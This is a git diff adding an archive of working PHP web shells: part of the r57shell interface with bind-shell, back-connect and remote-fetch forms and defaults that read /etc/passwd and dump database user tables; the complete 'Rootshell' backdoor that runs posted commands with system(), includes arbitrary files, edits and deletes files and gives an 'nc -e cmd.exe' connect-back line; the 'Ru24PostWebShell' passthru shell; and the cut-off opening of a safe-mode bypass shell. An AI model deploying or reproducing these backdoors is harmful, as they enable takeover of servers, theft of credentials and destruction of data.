+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].$table_up2.$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text76'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.$table_end1.$fe;
+echo $fs.$table_up1.$lang[$language.'_text32'].$table_up2.$font;
+echo "<div align=center><textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].$table_up2.$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.$lang[$language.'_text5'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].$table_up2.$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.$table_end1.$fe;
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+echo $table_up1.$lang[$language.'_text82'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select name=db><option>MySQL</option><option>MSSQL</option><option>PostgreSQL</option><option>Oracle</option></select>");
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></table>";
+}
+?>
\ No newline at end of file
diff --git a/138shell/R/rootshell.txt b/138shell/R/rootshell.txt
new file mode 100644
index 0000000..202d779
--- /dev/null
+++ b/138shell/R/rootshell.txt
@@ -0,0 +1,349 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*    1.3.3          666            added "File Editor"
+/*    2.0.0          666            added "Notices"
+/*    2.0.0          666            added some new modules
+/*    2.0.0          666            made some design updates
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "shells.dl.am";                                                      // Insert your nick
+$version      = "2.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
+} else {
+   print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+      </tr>
+      <tr>
+      <td style="overflow:auto" width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center">
+      <br>
+<div align="center" style="overflow:auto; width:99%; height:175">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
+}
+closedir($folder);
+?>
+</div><p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+<font face="Verdana" style="font-size: 11pt">
+      <p align="center"><?
+$scriptname = $_SERVER['SCRIPT_NAME'];
+$filename = $_POST["filename"];
+
+if($_POST["submit"] == "Open")
+{
+	if(file_exists($filename))
+	{
+		$filecontents = htmlentities(file_get_contents($filename));
+
+		if(!$filecontents)
+			$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}		
+else if($_POST["submit"] == "Delete")
+{
+	if(file_exists($filename))
+	{
+		if(unlink($filename))	
+			$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
+		else
+			$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
+	}
+	else
+		$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
+}
+else if($_POST["submit"] == "Save")
+{
+	$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
+
+	if(file_exists($filename))
+		unlink($filename);
+
+	$handle = fopen($filename, "w");
+
+	if(!$handle)
+		$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
+	else
+	{
+		if(!fwrite($handle, $filecontents))
+			$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
+
+		fclose($handle);
+	}
+
+	$filecontents = htmlentities($filecontents);
+}
+else
+{
+	$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
+}
+?>
+<table border="0" align="center">
+		
+		<tr>
+			<td>
+				<table width="100%" border="0">
+				<tr>
+					<td>
+						<form method="post" action="<?echo $scriptname;?>">
+							<input name="filename" type="text" value="<?echo $filename;?>" size="20">
+							<input type="submit" name="submit" value="Open">
+							<input type="submit" name="submit" value="Delete">
+					</td>
+				</tr>
+				</table>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+					<font face="Verdana" style="font-size: 11pt">
+					<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
+					<input type="submit" name="submit" value="Save">
+					<input type="reset" value="Reset">
+				</form>
+			</td>
+		</tr>
+
+		<tr>
+			<td>
+				<h2><?echo $status;?></h2>
+			</td>
+		</tr>
+		</table>				</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+<textarea rows="13" cols="55"></textarea><br>
+      &nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
+      <td width="100%" bgcolor="#FCFEBA" height="20">
+      <p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?>  © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.org">SR-Crew</a> </font></td>
+    </tr>
+  </table>
+  </center>
+</div>
\ No newline at end of file
diff --git a/138shell/R/ru24_post_sh.php.txt b/138shell/R/ru24_post_sh.php.txt
new file mode 100644
index 0000000..5600c64
--- /dev/null
+++ b/138shell/R/ru24_post_sh.php.txt
@@ -0,0 +1,23 @@
+<?php
+/*
+Ru24PostWebShell
+Writed by DreAmeRz
+
+http://www.ru24-team.net
+*/
+error_reporting(0);
+$function=passthru; // system, exec, cmd
+echo "<html>
+<head>
+<title>Ru24PostWebShell - ".$_POST['cmd']."</title>
+<meta http-equiv='pragma' content='no-cache'>
+</head><body>";
+echo "<form method=post>";
+echo "<input type=text name=cmd size=85>";
+echo "</form>";
+echo "<pre>";
+if ((!$_POST['cmd']) || ($_POST['cmd']=="")) { $_POST['cmd']="id;pwd;uname -a;ls -la"; }
+echo "".$function($_POST['cmd'])."</pre></body></html>";
+
+
+?>
diff --git a/138shell/README.md b/138shell/README.md
new file mode 100644
index 0000000..0bfa6b6
--- /dev/null
+++ b/138shell/README.md
@@ -0,0 +1,5 @@
+这个是天阳网络技术论�收集的
+虽然天阳已�关闭
+�过�的东西还都是�错的。。
+留个纪念���
+by tian6
\ No newline at end of file
diff --git a/138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt b/138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt
new file mode 100644
index 0000000..34d7f7c
--- /dev/null
+++ b/138shell/S/Safe0ver Shell -Safe Mod Bypass By Evilc0der.txt	
@@ -0,0 +1,950 @@
+<?php 
+
+
+/*
+*****************************************************************************************
+*                           Safe0ver Shell //Safe Mod Bypass By Evilc0der                *
+***************************************************************************************** 
+*        Evilc0der.org is a Platform Which You can Publish Your Shell Script             *  
+
+***************************************************************************************** 
+
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+!!   Dikkat ! Script Egitim Amacli Yazilmistir.Scripti Kullanarak Yapacaginiz Illegal eylemlerden sorumlu Degiliz. 
+!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 
+*/ 
+
+
+/*Setting some envirionment variables...*/ 
+
+/* I added this to ensure the script will run correctly...
